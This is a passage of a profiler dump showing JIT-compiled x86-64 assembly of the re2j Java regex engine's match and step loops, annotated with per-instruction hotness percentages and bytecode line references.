0x00007eff1123e723: mov %r11,0x50(%rsp)
0.00% 0x00007eff1123e728: xor %eax,%eax
0x00007eff1123e72a: xor %r11d,%r11d
0.00% 0x00007eff1123e72d: mov %r11d,0x3c(%rsp)
╭ 0x00007eff1123e732: jmpq 0x00007eff1123ea94
0.00% 0.01% │ ↗ 0x00007eff1123e737: or $0xa,%r10d ;*ior ; - com.google.re2j.Utils::emptyOpContext@27 (line 180)
│ │ ; - com.google.re2j.Machine::match@326 (line 245)
0.00% │╭ │ 0x00007eff1123e73b: jmpq 0x00007eff1123eb6e
0.01% ││ ↗ │ 0x00007eff1123e740: mov $0x5,%r10d
││╭ │ │ 0x00007eff1123e746: jmpq 0x00007eff1123eb57
0.33% 0.44% │││ ↗↗↗ │ │ 0x00007eff1123e74b: mov 0x2c(%r12,%rcx,8),%ebp ;*getfield outInst
│││ │││ │ │ ; - com.google.re2j.Machine::step@199 (line 317)
│││ │││ │ │ ; - com.google.re2j.Machine::match@359 (line 246)
0.30% 0.40% │││ │││ │ │ 0x00007eff1123e750: mov 0x8(%r12,%rbp,8),%ecx ; implicit exception: dispatches to 0x00007eff1123fd91
0.34% 0.14% │││ │││ │ │ 0x00007eff1123e755: cmp $0xf8019909,%ecx ; {metadata('com/google/re2j/Inst$MatchInst')}
│││ │││ │ │ 0x00007eff1123e75b: jne 0x00007eff1123f4b1
0.12% 0.07% │││ │││ │ │ 0x00007eff1123e761: lea (%r12,%rbp,8),%r9 ;*invokevirtual add
│││ │││ │ │ ; - com.google.re2j.Machine::step@214 (line 317)
│││ │││ │ │ ; - com.google.re2j.Machine::match@359 (line 246)
0.00% 0.00% │││ │││ │ │ 0x00007eff1123e765: vmovq %r9,%xmm2
0.01% 0.02% │││ │││ │ │ 0x00007eff1123e76a: mov 0x18(%r9),%r9d ;*getfield pc
│││ │││ │ │ ; - com.google.re2j.Inst$MatchInst::add@2 (line 144)
│││ │││ │ │ ; - com.google.re2j.Machine::step@214 (line 317)
│││ │││ │ │ ; - com.google.re2j.Machine::match@359 (line 246)
0.07% 0.01% │││ │││ │ │ 0x00007eff1123e76e: vmovd %r9d,%xmm5
0.11% 0.07% │││ │││ │ │ 0x00007eff1123e773: mov 0x50(%rsp),%r9
0.01% │││ │││ │ │ 0x00007eff1123e778: mov 0x10(%r9),%r9 ;*getfield pcsl
│││ │││ │ │ ; - com.google.re2j.Machine$Queue::contains@7 (line 42)
│││ │││ │ │ ; - com.google.re2j.Inst$MatchInst::add@5 (line 144)
│││ │││ │ │ ; - com.google.re2j.Machine::step@214 (line 317)
│││ │││ │ │ ; - com.google.re2j.Machine::match@359 (line 246)
│││ │││ │ │ ; implicit exception: dispatches to 0x00007eff1123fdad
0.01% 0.00% │││ │││ │ │ 0x00007eff1123e77c: vmovd %xmm5,%ecx
0.13% 0.12% │││ │││ │ │ 0x00007eff1123e780: cmp $0x40,%ecx
│││ │││ │ │ 0x00007eff1123e783: jg 0x00007eff1123f59d ;*if_icmpgt
│││ │││ │ │ ; - com.google.re2j.Machine$Queue::contains@3 (line 41)
│││ │││ │ │ ; - com.google.re2j.Inst$MatchInst::add@5 (line 144)
│││ │││ │ │ ; - com.google.re2j.Machine::step@214 (line 317)
│││ │││ │ │ ; - com.google.re2j.Machine::match@359 (line 246)
0.12% 0.11% │││ │││ │ │ 0x00007eff1123e789: mov $0x1,%edi
│││ │││ │ │ 0x00007eff1123e78e: shl %cl,%rdi ;*lshl
│││ │││ │ │ ; - com.google.re2j.Machine$Queue::contains@12 (line 42)
│││ │││ │ │ ; - com.google.re2j.Inst$MatchInst::add@5 (line 144)
│││ │││ │ │ ; - com.google.re2j.Machine::step@214 (line 317)
│││ │││ │ │ ; - com.google.re2j.Machine::match@359 (line 246)
0.23% 0.22% │││ │││ │ │ 0x00007eff1123e791: mov %r9,%rcx
0.00% │││ │││ │ │ 0x00007eff1123e794: and %rdi,%rcx ;*land
│││ │││ │ │ ; - com.google.re2j.Machine$Queue::contains@13 (line 42)
│││ │││ │ │ ; - com.google.re2j.Inst$MatchInst::add@5 (line 144)
│││ │││ │ │ ; - com.google.re2j.Machine::step@214 (line 317)
│││ │││ │ │ ; - com.google.re2j.Machine::match@359 (line 246)
0.01% 0.01% │││ │││ │ │ 0x00007eff1123e797: test %rcx,%rcx
│││ │││ │ │ 0x00007eff1123e79a: jne 0x00007eff1123f621 ;*ifeq
│││ │││ │ │ ; - com.google.re2j.Machine$Queue::contains@16 (line 42)
│││ │││ │ │ ; - com.google.re2j.Inst$MatchInst::add@5 (line 144)
│││ │││ │ │ ; - com.google.re2j.Machine::step@214 (line 317)
│││ │││ │ │ ; - com.google.re2j.Machine::match@359 (line 246)
0.12% 0.10% │││ │││ │ │ 0x00007eff1123e7a0: vmovd %xmm5,%ecx
0.01% │││ │││ │ │ 0x00007eff1123e7a4: cmp $0x40,%ecx
│││ │││ │ │ 0x00007eff1123e7a7: jge 0x00007eff1123f6a1 ;*if_icmpge
│││ │││ │ │ ; - com.google.re2j.Machine$Queue::add@3 (line 51)
│││ │││ │ │ ; - com.google.re2j.Inst$MatchInst::add@19 (line 147)
│││ │││ │ │ ; - com.google.re2j.Machine::step@214 (line 317)
│││ │││ │ │ ; - com.google.re2j.Machine::match@359 (line 246)
0.04% 0.10% │││ │││ │ │ 0x00007eff1123e7ad: mov 0x50(%rsp),%rcx
│││ │││ │ │ 0x00007eff1123e7b2: mov %r12b,0x18(%rcx) ;*putfield empty
│││ │││ │ │ ; - com.google.re2j.Machine$Queue::add@33 (line 56)
│││ │││ │ │ ; - com.google.re2j.Inst$MatchInst::add@19 (line 147)
│││ │││ │ │ ; - com.google.re2j.Machine::step@214 (line 317)
│││ │││ │ │ ; - com.google.re2j.Machine::match@359 (line 246)
0.08% 0.05% │││ │││ │ │ 0x00007eff1123e7b6: mov 0x20(%rcx),%ecx ;*getfield denseThreadsInstructions
│││ │││ │ │ ; - com.google.re2j.Machine$Queue::addThread@1 (line 66)
│││ │││ │ │ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│││ │││ │ │ ; - com.google.re2j.Machine::step@214 (line 317)
│││ │││ │ │ ; - com.google.re2j.Machine::match@359 (line 246)
0.08% 0.02% │││ │││ │ │ 0x00007eff1123e7b9: vmovd %ecx,%xmm4
0.12% 0.06% │││ │││ │ │ 0x00007eff1123e7bd: mov 0x50(%rsp),%rcx
0.02% │││ │││ │ │ 0x00007eff1123e7c2: mov 0xc(%rcx),%ebp ;*getfield size
│││ │││ │ │ ; - com.google.re2j.Machine$Queue::addThread@6 (line 66)
│││ │││ │ │ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│││ │││ │ │ ; - com.google.re2j.Machine::step@214 (line 317)
│││ │││ │ │ ; - com.google.re2j.Machine::match@359 (line 246)
0.11% 0.08% │││ │││ │ │ 0x00007eff1123e7c5: or %r9,%rdi
0.01% 0.04% │││ │││ │ │ 0x00007eff1123e7c8: mov %rdi,0x10(%rcx) ;*putfield pcsl
│││ │││ │ │ ; - com.google.re2j.Machine$Queue::add@15 (line 52)
│││ │││ │ │ ; - com.google.re2j.Inst$MatchInst::add@19 (line 147)
│││ │││ │ │ ; - com.google.re2j.Machine::step@214 (line 317)
│││ │││ │ │ ; - com.google.re2j.Machine::match@359 (line 246)
0.10% 0.05% │││ │││ │ │ 0x00007eff1123e7cc: mov %ebp,%r9d
0.01% 0.00% │││ │││ │ │ 0x00007eff1123e7cf: inc %r9d
0.04% 0.10% │││ │││ │ │ 0x00007eff1123e7d2: mov %r9d,0xc(%rcx) ;*putfield size
│││ │││ │ │ ; - com.google.re2j.Machine$Queue::addThread@12 (line 66)
│││ │││ │ │ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│││ │││ │ │ ; - com.google.re2j.Machine::step@214 (line 317)
│││ │││ │ │ ; - com.google.re2j.Machine::match@359 (line 246)
0.02% 0.01% │││ │││ │ │ 0x00007eff1123e7d6: vmovd %xmm4,%r9d
0.03% 0.09% │││ │││ │ │ 0x00007eff1123e7db: mov 0xc(%r12,%r9,8),%r9d ; implicit exception: dispatches to 0x00007eff1123fdc1
0.23% 0.12% │││ │││ │ │ 0x00007eff1123e7e0: cmp %r9d,%ebp
│││ │││ │ │ 0x00007eff1123e7e3: jae 0x00007eff1123f431
0.24% 0.24% │││ │││ │ │ 0x00007eff1123e7e9: vmovd %xmm4,%r9d
0.01% 0.00% │││ │││ │ │ 0x00007eff1123e7ee: mov 0x8(%r12,%r9,8),%ecx
0.02% 0.01% │││ │││ │ │ 0x00007eff1123e7f3: cmp $0xf8019807,%ecx ; {metadata('com/google/re2j/Inst'[])}
│││ │││ │ │ 0x00007eff1123e7f9: jne 0x00007eff1123f519 ;*aastore
│││ │││ │ │ ; - com.google.re2j.Machine$Queue::addThread@16 (line 66)
│││ │││ │ │ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│││ │││ │ │ ; - com.google.re2j.Machine::step@214 (line 317)
│││ │││ │ │ ; - com.google.re2j.Machine::match@359 (line 246)
0.07% 0.09% │││ │││ │ │ 0x00007eff1123e7ff: shl $0x3,%r9 ;*getfield denseThreadsInstructions
│││ │││ │ │ ; - com.google.re2j.Machine$Queue::addThread@1 (line 66)
│││ │││ │ │ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│││ │││ │ │ ; - com.google.re2j.Machine::step@214 (line 317)
│││ │││ │ │ ; - com.google.re2j.Machine::match@359 (line 246)
0.04% 0.06% │││ │││ │ │ 0x00007eff1123e803: lea 0x10(%r9,%rbp,4),%r9
│││ │││ │ │ 0x00007eff1123e808: vmovq %xmm2,%rcx
0.02% 0.03% │││ │││ │ │ 0x00007eff1123e80d: shr $0x3,%rcx
0.07% 0.05% │││ │││ │ │ 0x00007eff1123e811: mov %ecx,(%r9)
0.23% 0.24% │││ │││ │ │ 0x00007eff1123e814: shr $0x9,%r9
0.00% 0.00% │││ │││ │ │ 0x00007eff1123e818: movabs $0x7eff20d45000,%rcx
0.03% 0.02% │││ │││ │ │ 0x00007eff1123e822: mov %r12b,(%rcx,%r9,1) ;*aastore
│││ │││ │ │ ; - com.google.re2j.Machine$Queue::addThread@16 (line 66)
│││ │││ │ │ ; - com.google.re2j.Inst$MatchInst::add@72 (line 158)
│││ │││ │ │ ; - com.google.re2j.Machine::step@214 (line 317)
│││ │││ │ │ ; - com.google.re2j.Machine::match@359 (line 246)
0.15% 0.25% │││╭ │││ │ │ 0x00007eff1123e826: jmpq 0x00007eff1123e943
0.40% 0.24% ││││ │││ │ │ ↗ 0x00007eff1123e82b: or $0x20,%r10d ;*iload_2
││││ │││ │ │ │ ; - com.google.re2j.Utils::emptyOpContext@63 (line 190)
││││ │││ │ │ │ ; - com.google.re2j.Machine::match@326 (line 245)
0.23% 0.26% ││││ │││ │ │ │↗ 0x00007eff1123e82f: mov 0x60(%rsp),%r11
0.24% 0.27% ││││ │││ │ │ ││ 0x00007eff1123e834: mov 0x14(%r11),%r11d ;*getfield re2
││││ │││ │ │ ││ ; - com.google.re2j.Machine::step@1 (line 280)
││││ │││ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
0.67% 0.71% ││││ │││ │ │ ││ 0x00007eff1123e838: movzbl 0x18(%r12,%r11,8),%r14d ;*getfield longest
││││ │││ │ │ ││ ; - com.google.re2j.Machine::step@4 (line 280)
││││ │││ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
││││ │││ │ │ ││ ; implicit exception: dispatches to 0x00007eff1123fd2d
1.10% 1.16% ││││ │││ │ │ ││ 0x00007eff1123e83e: mov 0x2c(%rsp),%r11d
0.15% 0.23% ││││ │││ │ │ ││ 0x00007eff1123e843: mov 0xc(%r12,%r11,8),%eax ;*getfield size
││││ │││ │ │ ││ ; - com.google.re2j.Machine::step@10 (line 281)
││││ │││ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
0.01% 0.02% ││││ │││ │ │ ││ 0x00007eff1123e848: mov 0x3c(%rsp),%r8d
0.05% 0.06% ││││ │││ │ │ ││ 0x00007eff1123e84d: add 0x20(%rsp),%r8d ;*iadd
││││ │││ │ │ ││ ; - com.google.re2j.Machine::match@340 (line 246)
0.45% 0.50% ││││ │││ │ │ ││ 0x00007eff1123e852: test %eax,%eax
││││╭ │││ │ │ ││ 0x00007eff1123e854: jle 0x00007eff1123e94b ;*if_icmpge
│││││ │││ │ │ ││ ; - com.google.re2j.Machine::step@40 (line 286)
│││││ │││ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
0.15% 0.17% │││││ │││ │ │ ││ 0x00007eff1123e85a: mov 0x24(%r12,%r11,8),%r9d ;*getfield denseThreadsCapture
│││││ │││ │ │ ││ ; - com.google.re2j.Machine::step@28 (line 284)
│││││ │││ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
0.02% │││││ │││ │ │ ││ 0x00007eff1123e85f: vmovd %r9d,%xmm1
0.06% 0.05% │││││ │││ │ │ ││ 0x00007eff1123e864: mov 0x20(%r12,%r11,8),%r11d ;*getfield denseThreadsInstructions
│││││ │││ │ │ ││ ; - com.google.re2j.Machine::step@22 (line 283)
│││││ │││ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
0.46% 0.50% │││││ │││ │ │ ││ 0x00007eff1123e869: vmovd %r11d,%xmm0
0.23% 0.17% │││││ │││ │ │ ││ 0x00007eff1123e86e: mov 0x60(%rsp),%r11
0.05% │││││ │││ │ │ ││ 0x00007eff1123e873: movzbl 0x11(%r11),%ecx ;*getfield captures
│││││ │││ │ │ ││ ; - com.google.re2j.Machine::step@16 (line 282)
│││││ │││ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
0.05% 0.06% │││││ │││ │ │ ││ 0x00007eff1123e878: mov 0x70(%rsp),%r11
0.47% 0.51% │││││ │││ │ │ ││ 0x00007eff1123e87d: mov 0x10(%r11),%r9d
0.24% 0.18% │││││ │││ │ │ ││ 0x00007eff1123e881: mov 0x3c(%rsp),%ebx
0.03% 0.02% │││││ │││ │ │ ││ 0x00007eff1123e885: mov $0x1,%r11d
0.03% 0.05% │││││ │││ │ │ ││ 0x00007eff1123e88b: xor %esi,%esi
0.45% 0.47% │││││ │││ │ │ ││ 0x00007eff1123e88d: cmp %r9d,%ebx
0.23% 0.22% │││││ │││ │ │ ││ 0x00007eff1123e890: cmovne %esi,%r11d ;*invokespecial step
│││││ │││ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
0.24% 0.18% │││││ │││ │ │ ││ 0x00007eff1123e894: vmovd %r11d,%xmm3
0.46% 0.49% │││││ │││ │ │ ││ 0x00007eff1123e899: test %ecx,%ecx
│││││ │││ │ │ ││ 0x00007eff1123e89b: jne 0x00007eff1123f081 ;*iload
│││││ │││ │ │ ││ ; - com.google.re2j.Machine::step@43 (line 289)
│││││ │││ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
0.19% 0.18% │││││ │││ │ │ ││ 0x00007eff1123e8a1: vmovd %xmm0,%r9d
0.02% 0.02% │││││ │││ │ │ ││ 0x00007eff1123e8a6: mov 0xc(%r12,%r9,8),%r9d ;*aaload
│││││ │││ │ │ ││ ; - com.google.re2j.Machine::step@99 (line 299)
│││││ │││ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
│││││ │││ │ │ ││ ; implicit exception: dispatches to 0x00007eff1123f081
0.04% 0.06% │││││ │││ │ │ ││ 0x00007eff1123e8ab: test %r9d,%r9d
│││││ │││ │ │ ││ 0x00007eff1123e8ae: jbe 0x00007eff1123f081
0.49% 0.30% │││││ │││ │ │ ││ 0x00007eff1123e8b4: mov %eax,%ebx
0.19% 0.23% │││││ │││ │ │ ││ 0x00007eff1123e8b6: dec %ebx
0.02% 0.02% │││││ │││ │ │ ││ 0x00007eff1123e8b8: cmp %r9d,%ebx
│││││ │││ │ │ ││ 0x00007eff1123e8bb: jae 0x00007eff1123f081
0.05% 0.05% │││││ │││ │ │ ││ 0x00007eff1123e8c1: vmovd %xmm0,%r11d
0.38% 0.55% │││││ │││ │ │ ││ 0x00007eff1123e8c6: lea (%r12,%r11,8),%rbx
0.19% 0.17% │││││ │││ │ │ ││ 0x00007eff1123e8ca: xor %r11d,%r11d
0.04% 0.03% │││││ │││ │ │ ││ 0x00007eff1123e8cd: data16 xchg %ax,%ax ;*iload
│││││ │││ │ │ ││ ; - com.google.re2j.Machine::step@43 (line 289)
│││││ │││ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
1.34% 1.29% │││││ │││↗ │ │ ││ 0x00007eff1123e8d0: mov 0x10(%rbx,%r11,4),%ecx ;*aaload
│││││ ││││ │ │ ││ ; - com.google.re2j.Machine::step@99 (line 299)
│││││ ││││ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
0.91% 0.83% │││││ ││││ │ │ ││ 0x00007eff1123e8d5: mov 0xc(%r12,%rcx,8),%r9d ;*getfield op
│││││ ││││ │ │ ││ ; - com.google.re2j.Machine::step@104 (line 301)
│││││ ││││ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
│││││ ││││ │ │ ││ ; implicit exception: dispatches to 0x00007eff1123fcdd
1.28% 1.19% │││││ ││││ │ │ ││ 0x00007eff1123e8da: cmp $0x6,%r9d
│││││╭││││ │ │ ││ 0x00007eff1123e8de: je 0x00007eff1123ec97 ;*if_icmpne
││││││││││ │ │ ││ ; - com.google.re2j.Machine::step@109 (line 301)
││││││││││ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
1.10% 0.81% ││││││││││ │ │ ││ 0x00007eff1123e8e4: cmp $0xa,%r9d
││││││╰│││ │ │ ││ 0x00007eff1123e8e8: je 0x00007eff1123e74b ;*if_icmpne
││││││ │││ │ │ ││ ; - com.google.re2j.Inst::matchRune@6 (line 90)
││││││ │││ │ │ ││ ; - com.google.re2j.Machine::step@191 (line 316)
││││││ │││ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
1.38% 1.35% ││││││ │││ │ │ ││ 0x00007eff1123e8ee: cmp $0xb,%r9d
││││││ │││ │ │ ││ 0x00007eff1123e8f2: je 0x00007eff1123eda9 ;*if_icmpne
││││││ │││ │ │ ││ ; - com.google.re2j.Inst::matchRune@17 (line 94)
││││││ │││ │ │ ││ ; - com.google.re2j.Machine::step@191 (line 316)
││││││ │││ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
1.20% 1.25% ││││││ │││ │ │ ││ 0x00007eff1123e8f8: cmp $0x9,%r9d
││││││ │││ │ │ ││ 0x00007eff1123e8fc: je 0x00007eff1123ee2d ;*if_icmpne
││││││ │││ │ │ ││ ; - com.google.re2j.Inst::matchRune@38 (line 98)
││││││ │││ │ │ ││ ; - com.google.re2j.Machine::step@191 (line 316)
││││││ │││ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
1.22% 0.92% ││││││ │││ │ │ ││ 0x00007eff1123e902: cmp $0xc,%r9d
││││││ │││ │ │ ││ 0x00007eff1123e906: jne 0x00007eff1123ed26 ;*if_icmpne
││││││ │││ │ │ ││ ; - com.google.re2j.Inst::matchRune@61 (line 102)
││││││ │││ │ │ ││ ; - com.google.re2j.Machine::step@191 (line 316)
││││││ │││ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
1.14% 1.40% ││││││ │││ │ │ ││ 0x00007eff1123e90c: mov 0x1c(%r12,%rcx,8),%edi ;*getfield f0
││││││ │││ │ │ ││ ; - com.google.re2j.Inst::matchRune@65 (line 103)
││││││ │││ │ │ ││ ; - com.google.re2j.Machine::step@191 (line 316)
││││││ │││ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
0.92% 0.85% ││││││ │││ │ │ ││ 0x00007eff1123e911: cmp %edx,%edi
││││││ ╰││ │ │ ││ 0x00007eff1123e913: je 0x00007eff1123e74b ;*if_icmpeq
││││││ ││ │ │ ││ ; - com.google.re2j.Inst::matchRune@69 (line 103)
││││││ ││ │ │ ││ ; - com.google.re2j.Machine::step@191 (line 316)
││││││ ││ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
1.53% 1.71% ││││││ ││ │ │ ││ 0x00007eff1123e919: mov 0x20(%r12,%rcx,8),%r9d ;*getfield f1
││││││ ││ │ │ ││ ; - com.google.re2j.Inst::matchRune@73 (line 103)
││││││ ││ │ │ ││ ; - com.google.re2j.Machine::step@191 (line 316)
││││││ ││ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
0.63% 0.78% ││││││ ││ │ │ ││ 0x00007eff1123e91e: cmp %edx,%r9d
││││││ ╰│ │ │ ││ 0x00007eff1123e921: je 0x00007eff1123e74b ;*if_icmpeq
││││││ │ │ │ ││ ; - com.google.re2j.Inst::matchRune@77 (line 103)
││││││ │ │ │ ││ ; - com.google.re2j.Machine::step@191 (line 316)
││││││ │ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
1.33% 1.49% ││││││ │ │ │ ││ 0x00007eff1123e927: mov 0x24(%r12,%rcx,8),%r9d ;*getfield f2
││││││ │ │ │ ││ ; - com.google.re2j.Inst::matchRune@81 (line 103)
││││││ │ │ │ ││ ; - com.google.re2j.Machine::step@191 (line 316)
││││││ │ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
0.95% 0.98% ││││││ │ │ │ ││ 0x00007eff1123e92c: cmp %edx,%r9d
││││││ │ │ │ ││ 0x00007eff1123e92f: je 0x00007eff1123eeb1 ;*if_icmpeq
││││││ │ │ │ ││ ; - com.google.re2j.Inst::matchRune@85 (line 103)
││││││ │ │ │ ││ ; - com.google.re2j.Machine::step@191 (line 316)
││││││ │ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
1.78% 2.02% ││││││ │ │ │ ││ 0x00007eff1123e935: mov 0x28(%r12,%rcx,8),%r9d ;*getfield f3
││││││ │ │ │ ││ ; - com.google.re2j.Inst::matchRune@89 (line 103)
││││││ │ │ │ ││ ; - com.google.re2j.Machine::step@191 (line 316)
││││││ │ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
0.52% 0.62% ││││││ │ │ │ ││ 0x00007eff1123e93a: cmp %edx,%r9d
││││││ │ │ │ ││ 0x00007eff1123e93d: je 0x00007eff1123ef31 ;*aload
││││││ │ │ │ ││ ; - com.google.re2j.Machine::step@219 (line 320)
││││││ │ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
1.04% 1.12% │││↘││ │ │ │ ││ 0x00007eff1123e943: inc %r11d ;*iinc
│││ ││ │ │ │ ││ ; - com.google.re2j.Machine::step@230 (line 286)
│││ ││ │ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
0.62% 0.73% │││ ││ │ │ │ ││ 0x00007eff1123e946: cmp %eax,%r11d
│││ ││ ╰ │ │ ││ 0x00007eff1123e949: jl 0x00007eff1123e8d0 ;*if_icmpge
│││ ││ │ │ ││ ; - com.google.re2j.Machine::step@40 (line 286)
│││ ││ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
0.32% 0.41% │││ ↘│ │ │ ││ 0x00007eff1123e94b: mov 0x2c(%rsp),%r9d
0.13% 0.16% │││ │ │ │ ││ 0x00007eff1123e950: movzbl 0x18(%r12,%r9,8),%r9d
0.18% 0.22% │││ │ │ │ ││ 0x00007eff1123e956: test %r9d,%r9d
│││ │ ╭ │ │ ││ 0x00007eff1123e959: jne 0x00007eff1123e97d ;*ifeq
│││ │ │ │ │ ││ ; - com.google.re2j.Machine$Queue::clear@4 (line 69)
│││ │ │ │ │ ││ ; - com.google.re2j.Machine::step@237 (line 324)
│││ │ │ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
0.19% 0.18% │││ │ │ │ │ ││ 0x00007eff1123e95b: mov 0x2c(%rsp),%r11d
0.27% 0.36% │││ │ │ │ │ ││ 0x00007eff1123e960: mov 0x1c(%r12,%r11,8),%ebp ;*getfield pcs
│││ │ │ │ │ ││ ; - com.google.re2j.Machine$Queue::clear@29 (line 73)
│││ │ │ │ │ ││ ; - com.google.re2j.Machine::step@237 (line 324)
│││ │ │ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
0.13% 0.14% │││ │ │ │ │ ││ 0x00007eff1123e965: movb $0x1,0x18(%r12,%r11,8) ;*putfield empty
│││ │ │ │ │ ││ ; - com.google.re2j.Machine$Queue::clear@15 (line 71)
│││ │ │ │ │ ││ ; - com.google.re2j.Machine::step@237 (line 324)
│││ │ │ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
0.35% 0.57% │││ │ │ │ │ ││ 0x00007eff1123e96b: mov %r12,0x10(%r12,%r11,8) ;*putfield pcsl
│││ │ │ │ │ ││ ; - com.google.re2j.Machine$Queue::clear@25 (line 72)
│││ │ │ │ │ ││ ; - com.google.re2j.Machine::step@237 (line 324)
│││ │ │ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
0.66% 1.03% │││ │ │ │ │ ││ 0x00007eff1123e970: mov %r12d,0xc(%r12,%r11,8) ;*putfield size
│││ │ │ │ │ ││ ; - com.google.re2j.Machine$Queue::clear@10 (line 70)
│││ │ │ │ │ ││ ; - com.google.re2j.Machine::step@237 (line 324)
│││ │ │ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
0.41% 0.69% │││ │ │ │ │ ││ 0x00007eff1123e975: test %ebp,%ebp
│││ │ │ │ │ ││ 0x00007eff1123e977: jne 0x00007eff1123f281 ;*invokevirtual clear
│││ │ │ │ │ ││ ; - com.google.re2j.Machine::step@237 (line 324)
│││ │ │ │ │ ││ ; - com.google.re2j.Machine::match@359 (line 246)
0.06% 0.05% │││ │ ↘ │ │ ││ 0x00007eff1123e97d: mov 0x60(%rsp),%r11
0.27% 0.45% │││ │ │ │ ││ 0x00007eff1123e982: movzbl 0x10(%r11),%eax ;*getfield matched
│││ │ │ │ ││ ; - com.google.re2j.Machine::match@378 (line 250)
0.40% 0.53% │││ │ │ │ ││ 0x00007eff1123e987: mov 0x60(%rsp),%r11
0.23% 0.31% │││ │ │ │ ││ 0x00007eff1123e98c: movzbl 0x11(%r11),%ebp ;*getfield captures
│││ │ │ │ ││ ; - com.google.re2j.Machine::match@371 (line 250)
0.13% 0.13% │││ │ │ │ ││ 0x00007eff1123e991: mov 0x20(%rsp),%r11d
0.16% 0.25% │││ │ │ │ ││ 0x00007eff1123e996: test %r11d,%r11d
│││ │ ╭ │ │ ││ 0x00007eff1123e999: je 0x00007eff1123ebd9 ;*ifne
│││ │ │ │ │ ││ ; - com.google.re2j.Machine::match@364 (line 247)
0.26% 0.38% │││ │ │ │ │ ││ 0x00007eff1123e99f: test %ebp,%ebp
│││ │ │ │ │ ││ 0x00007eff1123e9a1: jne 0x00007eff1123f161 ;*ifne
│││ │ │ │ │ ││ ; - com.google.re2j.Machine::match@374 (line 250)
0.20% 0.24% │││ │ │ │ │ ││ 0x00007eff1123e9a7: test %eax,%eax
│││ │ │ │ │ ││ 0x00007eff1123e9a9: jne 0x00007eff1123f241 ;*ifeq
│││ │ │ │ │ ││ ; - com.google.re2j.Machine::match@381 (line 250)
0.03% 0.08% │││ │ │ │ │ ││ 0x00007eff1123e9af: cmp $0xffffffff,%r13d
│││ │ │╭ │ │ ││ 0x00007eff1123e9b3: je 0x00007eff1123ec18 ;*if_icmpeq
│││ │ ││ │ │ ││ ; - com.google.re2j.Machine::match@403 (line 258)
0.17% 0.24% │││ │ ││ │ │ ││ 0x00007eff1123e9b9: mov %r13d,0x24(%rsp)
0.24% 0.34% │││ │ ││ │ │ ││ 0x00007eff1123e9be: mov 0x70(%rsp),%r11
1.11% 1.59% │││ │ ││ │ │ ││ 0x00007eff1123e9c3: mov 0x10(%r11),%r11d ;*getfield end
│││ │ ││ │ │ ││ ; - com.google.re2j.MachineInput$UTF16Input::step@9 (line 186)
│││ │ ││ │ │ ││ ; - com.google.re2j.Machine::match@411 (line 259)
0.89% 1.23% │││ │ ││ │ │ ││ 0x00007eff1123e9c7: mov 0x34(%rsp),%r9d
0.08% 0.11% │││ │ ││ │ │ ││ 0x00007eff1123e9cc: add %r8d,%r9d
0.20% 0.22% │││ │ ││ │ │ ││ 0x00007eff1123e9cf: mov 0x70(%rsp),%rcx
0.20% 0.34% │││ │ ││ │ │ ││ 0x00007eff1123e9d4: add 0xc(%rcx),%r9d ;*iadd
│││ │ ││ │ │ ││ ; - com.google.re2j.MachineInput$UTF16Input::step@5 (line 185)
│││ │ ││ │ │ ││ ; - com.google.re2j.Machine::match@411 (line 259)
0.56% 0.54% │││ │ ││ │ │ ││ 0x00007eff1123e9d8: cmp %r11d,%r9d
│││ │ ││╭ │ │ ││ 0x00007eff1123e9db: jge 0x00007eff1123ec2b ;*if_icmpge
│││ │ │││ │ │ ││ ; - com.google.re2j.MachineInput$UTF16Input::step@12 (line 186)
│││ │ │││ │ │ ││ ; - com.google.re2j.Machine::match@411 (line 259)
0.42% 0.47% │││ │ │││ │ │ ││ 0x00007eff1123e9e1: mov 0x14(%rcx),%ebp ;*getfield str
│││ │ │││ │ │ ││ ; - com.google.re2j.MachineInput$UTF16Input::step@16 (line 187)
│││ │ │││ │ │ ││ ; - com.google.re2j.Machine::match@411 (line 259)
0.18% 0.23% │││ │ │││ │ │ ││ 0x00007eff1123e9e4: mov 0x8(%r12,%rbp,8),%r11d ; implicit exception: dispatches to 0x00007eff1123fd3d
1.29% 1.13% │││ │ │││ │ │ ││ 0x00007eff1123e9e9: cmp $0xf80002da,%r11d ; {metadata('java/lang/String')}
│││ │ │││ │ │ ││ 0x00007eff1123e9f0: jne 0x00007eff1123f045
0.34% 0.24% │││ │ │││ │ │ ││ 0x00007eff1123e9f6: lea (%r12,%rbp,8),%rbx ;*invokeinterface charAt
